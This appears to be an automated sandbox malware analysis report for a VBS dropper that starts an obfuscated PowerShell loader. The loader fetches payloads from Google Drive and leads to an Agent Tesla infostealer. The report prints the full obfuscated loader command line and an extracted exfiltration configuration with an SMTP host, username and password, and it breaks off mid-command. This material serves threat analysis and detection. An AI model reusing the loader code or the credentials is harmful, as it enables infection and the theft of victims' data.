            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\G4-TODOS.vbs", ProcessId: 1516, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van buTiresc Usrp?DecoleP.enyx An.lpProduoFootlrSpooftBaand= Slutdch.huoFo,skwBeic,n ForhlPictoo.uropaLagridopsam&VindeiCommedMissi=Upbla1John,HColdnPRavnembetjeR Ber WKn.glX nstedTrforwTrninNCarioI Trbe6SportXCount5 vvefgErhveYskuess SweemColpeIH,len9KandivSign.6TarmreSkimoKCo,ciJTvangz BegiI Entrt Met,1BugleGA gel-retretprog.t erve ';$Noncombustible173=Fritidsmuligheds 'Botet>Trskn ';$Arbejdsvrelser=Fritidsmuligheds 'SelviiSupereIn skxBredb ';$Museumsgenstande='Haplessnesses';Exuberate (Fritidsmuligheds 'RustfSR ppeeUnquotPa,as-LnforCReubeoSmovsntranstTweene CostnBesantScler Ejnar-ElectPUnaddaLobeltFlusthAfhng ilitTNeigh:Unlar\ Gul S,oninoBeha,mAheyrbTriale .remrPestii footsreno.hGylte. Nutlt V.luxDa.nitCigar Mi.k- Rt sVLindaaSta.nlCavalu IliaeFun,t Godmo$ UltrMHim eu.affesKlarleDelf uEkspamSalams LommgBencheHnsesn resisL,mbetClevea PatenSteridPistoeScrei;Su,fe ');Exuberate (Fritidsmuligheds ' a,niiDendrfFortr I.raf(ElefatUnspieSki.dsTermitTid,e-Li iepSmiggaTal ht Overh Gulv u,teT Rors:T.aum\ScarlSflyttoTilhymCame,bUnc,aeHaandrSyri.iTer is UhaahBiory.Retint lumixProbit Rrlg) Expi{ConcleRedbuxf.deri GalmtC.ort} Ledd;.ksam ');$chaussebrolgningens = Fritidsmuligheds 'chan.erenticWh.elhmyarioO ist Fibr%Lgnera edlgpGrsropMyrekdKapitaLivsvtGrapla,utde%Capen\QuinoCSadacostrmhl Bahue SnniosummapAns,atBengniEtchilInc.nuo.eramMoudi.SordiUSlagtnVkstrwstran Despo& hjl&Heter peakeMetamcharmohStumpoGhost .eapf$Sepul ';Exuberate (Fritidsmuligheds ' itch$ afrigNeotel FejloKu,esbSen,eaUnspilsams,:OprreS SiveuFandapRecogpPregelPistei Sk,nc SionaVerdetHalvfeun.il= M dn(Inddacmytilm SkoldStilg M nha/FortrcAnted U.gdo$TrretcSprouhSkilbalamm,u A emsE entsSkaaremudpubTmre,rVellooUnderl BeebgSp,eanordknibuld nxanthgshptse nfignResissop rd)Irrit ');Exuberate (Frit

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: newfile.exe.824.24.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: Binary string: qm.Core.pdb7 source: powershell.exe, 0000000D.00000002.1839791361.00000000082CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1836814367.0000000007366000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb_ source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000D.00000002.1839791361.00000000082BA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdbGCTL source: newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1832644121.0000000002D14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe, newfile.exe, 00000016.00000002.1972097534.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe, 00000018.00000002.2051745191.00000000005F1000.00000020.00000001.01000000.00000008.sdmp, newfile.exe.18.dr

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.9:49715 -> 114.142.162.17:26
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 114.142.162.17 114.142.162.17
            Source: Joe Sandbox ViewASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580552000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cash4cars.nz
            Source: powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0R
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000005.00000002.1942203516.00000225821F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000005.00000002.1942203516.00000225820DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
            Source: wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/q
            Source: wab.exe, 00000012.00000002.2573561659.0000000006671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2574645551.0000000006730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-ttP
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-ttXR
            Source: powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000012.00000003.2163783606.000000000669E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000012.00000003.2163783606.0000000006671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000668D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.0000000006671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download
            Source: powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comzE
            Source: powershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000005.00000002.1942203516.0000022581566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.101.113:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49712 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_4632.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_2080.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 4632, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2080, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7537
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7537
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7537Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7537Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Utmmeligheds = 1;$Skimme='Substrin';$Skimme+='g';Function Fritidsmuligheds($Udrejseforbuddene){$Valetism=$Udrejseforbuddene.Length-$Utmmeligheds;For($Syring=5; $Syring -lt $Valetism; $Syring+=(6)){$Fundamentalismen+=$Udrejseforbuddene.$Skimme.Invoke($Syring, $Utmmeligheds);}$Fundamentalismen;}function Exuberate($Lavrss){&($Arbejdsvrelser) ($Lavrss);}$Flokkede=Fritidsmuligheds ' FeltM DumpoholdfzTorreiDdsfjl Ihukl.ennaa trol/Hydro5 Byst.Mosdy0,yrin Hoved(KrydsWModerinat.inHvntrdFagopoHapt wIndves Si.e SprinNbakkeTAfsyn Smukk1Spids0 Flue. Garg0Coper;Le.te KahiWBr.ndiIodo.nYndet6 uls4nonco;Heire s.inkxSynsh6 Bier4Lgeu ; Kara BojsdrAktievP.ege:Krige1Tan.p2Ha.de1Overm.Enhus0Propi) tage NargiGStilheEg,trcDclasken,osoSvnig/Tykm.2Svang0Oks,p1Parac0para.0G.lva1 Bull0Jasmi1Over. DikerF badeiConcer Bra,eUnderfDepaiobyggexTange/ Unis1Pharm2 Atr.1 Tj n. hens0Homop ';$Medicopsychological=Fritidsmuligheds ' BeflUAgi,ns Lac eOve,frPolya-apoteAWardegtre ceSa,kenPo.tot,wist ';$Infection=Fritidsmuligheds ',ingmhModhat afmgtdissop cilis Au,o:Flamb/ Seku/ ,elnd ExtrrUds,yiParagv Pseue Fati.drowngEvighoBr.ttoOrg,ngKrakelMikroeUndep.Fo micAffaloPanermWe eg/Van 